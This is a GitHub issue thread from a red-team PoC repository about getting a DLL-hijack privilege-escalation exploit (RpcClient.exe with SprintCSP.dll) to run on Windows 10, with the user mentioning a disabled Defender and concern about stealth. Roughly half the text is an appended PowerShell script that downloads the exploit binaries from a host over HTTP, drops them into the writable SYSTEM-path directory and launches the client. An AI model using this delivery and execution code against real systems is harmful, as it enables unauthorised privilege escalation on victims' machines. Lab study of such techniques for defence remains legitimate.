blackarrowsec / redteam-research

Collection of PoC and offensive techniques used by the BlackArrow Red Team


Why is the command not executed on my Windows 10 version 10.0.19044.2604?

thomsoe opened this issue · comments

So I have this Windows 10 21H2 with the following precise version:

[screenshot: winver output]

I built both RpcClient.exe and SprintCSP.dll without changing anything; I kept the default command in the DLL as well as the define macro. I have a writable SYSTEM path "C:\python" where I put the DLL. I monitored the execution of RpcClient.exe with ProcMon and I can see the DLL being loaded:

[screenshot: ProcMon showing the DLL load]

It is loaded when I start RpcClient, but the command is not executed (I tried different commands).

I noticed this error:

[screenshot: ProcMon event with result "FILE LOCKED ONLY FOR READERS"]

I tried changing the permissions to full control for everybody, but it didn't change anything.

What is the problem? What did I do wrong?

Feel free to ask me for more information.
(Obviously Windows Defender is asleep.)

Edit: I tried with a Windows 10 21H1 version 10.0.19043.928 and I get the same result. I searched a bit on the Internet for "FILE LOCKED ONLY FOR READERS" and it seems it may be linked to the fact that the files (.dll and .exe) come from a shared folder (a VMware shared folder between the victim VM and my host). I'll try to compile everything on the VM.

Second edit: I actually built everything on the target machine and it worked. But building everything on the machine you want to privesc on is not really stealthy or realistic for a red team. Do you know why I get the error in ProcMon when I compile the files on my host machine and not on the target?

Hi @thomsoe,

As far as I know, the "FILE LOCKED ONLY FOR READERS" message is not an error code; it actually means that the file has been read properly but its content cannot be modified until the lock is released.
I don't really know why the command is not executed when using a VMware shared folder, but it definitely has nothing to do with the PoC itself. I recommend you try delivering the .exe and the .dll a different way, maybe in a zip file over HTTP. That way it should work properly.

On the other hand, as you say, it is not good practice to compile the code on the target machine, but it is not required at all in order to make it work.
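The delivery route suggested above (zip the two binaries on the host, fetch them over HTTP on the target, unpack into the writable directory) as an added PowerShell example. This is not code from the repository or from either participant; the URL, the directory `C:\python`, the file names and the expected SHA256 hashes are assumptions for illustration. It also checks the things that would explain "it loads but does nothing" in a delivery problem: that the bytes on the target match what was built on the host, that the directory really is writable, and that the DLL can actually be opened for reading by the current user.

```powershell
# Host side (assumed, run once before this script):
#   Compress-Archive -Path .\RpcClient.exe, .\SprintCSP.dll -DestinationPath .\poc.zip
#   Get-FileHash .\RpcClient.exe, .\SprintCSP.dll -Algorithm SHA256   # note the hashes
#   python -m http.server 8000                                         # serve poc.zip

param(
    [string]$Url     = 'http://192.168.56.1:8000/poc.zip',   # assumed host address
    [string]$DestDir = 'C:\python',                           # writable path used in the issue
    # Assumed hashes: replace with the values printed on the build host.
    [hashtable]$Expected = @{
        'RpcClient.exe' = '0000000000000000000000000000000000000000000000000000000000000000'
        'SprintCSP.dll' = '0000000000000000000000000000000000000000000000000000000000000000'
    }
)

$ErrorActionPreference = 'Stop'

# 1. The target directory must exist and be writable by the user running the PoC.
if (-not (Test-Path -LiteralPath $DestDir)) { New-Item -ItemType Directory -Path $DestDir | Out-Null }
$probe = Join-Path $DestDir ([IO.Path]::GetRandomFileName())
try {
    [IO.File]::WriteAllBytes($probe, [byte[]](0))
    Remove-Item -LiteralPath $probe
    Write-Host "[+] $DestDir is writable"
} catch {
    throw "[-] $DestDir is not writable: $($_.Exception.Message)"
}

# 2. Fetch the archive over HTTP and unpack it into the target directory.
$zip = Join-Path $env:TEMP 'poc.zip'
Invoke-WebRequest -Uri $Url -OutFile $zip -UseBasicParsing
Expand-Archive -Path $zip -DestinationPath $DestDir -Force
Remove-Item -LiteralPath $zip

# 3. Verify each file arrived byte-for-byte identical to the host build.
foreach ($name in $Expected.Keys) {
    $path = Join-Path $DestDir $name
    if (-not (Test-Path -LiteralPath $path)) { throw "[-] $name missing after extraction" }

    $actual = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
    if ($actual -ne $Expected[$name].ToUpper()) {
        throw "[-] $name hash mismatch: expected $($Expected[$name]) got $actual"
    }
    Write-Host "[+] $name SHA256 OK"

    # 4. Confirm the file can be opened for reading (the DLL must be loadable
    #    by the RPC client); a sharing violation here would point at a lock
    #    held by another process rather than at the PoC.
    $fs = [IO.File]::Open($path, [IO.FileMode]::Open, [IO.FileAccess]::Read, [IO.FileShare]::Read)
    $fs.Close()
    Write-Host "[+] $name opens for read"
}

# 5. Launch the client from the directory that now holds the DLL.
Start-Process -FilePath (Join-Path $DestDir 'RpcClient.exe') -WorkingDirectory $DestDir
```

If step 3 fails, the binaries were altered or truncated in transit, which is worth ruling out before looking anywhere else; if step 4 throws a sharing violation, something else on the machine is holding the file, which is the one case where a ProcMon "locked" result would matter.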